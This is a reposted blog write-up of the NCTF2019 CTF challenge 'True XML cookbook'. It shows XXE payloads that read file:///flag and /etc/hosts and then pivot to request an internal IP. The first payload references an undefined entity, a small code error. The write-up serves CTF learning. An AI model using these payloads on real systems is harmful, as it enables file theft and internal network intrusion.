首页 > 其他 > 详细

[NCTF2019]True XML cookbook

时间:2020-11-15 18:19:50      阅读:185      评论:0      收藏:0      [点我收藏+]

[NCTF2019]True XML cookbook

爆破

抓包爆破,想直接爆出密码。
然鹅我天真了。

XXE漏洞

这里存在XXE漏洞,利用脚本直接打:
构造:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "file:///flag">
]>
<user>
  <username>&admin;</username>
  <password>password</password>
</user>

技术分享图片

没有哦·····

打内网

XXE漏洞可以直接攻击内网用户,先查看内网存活主机:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "file:///etc/hosts">
]>
<user>
  <username>&file;</username>
  <password>password</password>
</user>

技术分享图片
看到了本机ip,但是不知道存活ip。
可以用BP爆破(但是看到wp上是说ip最后一位为11):

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "http://10.34.239.11">
]>
<user>
  <username>&file;</username>
  <password>password</password>
</user>

技术分享图片

[NCTF2019]True XML cookbook

原文:https://www.cnblogs.com/shenjuxian/p/13977582.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!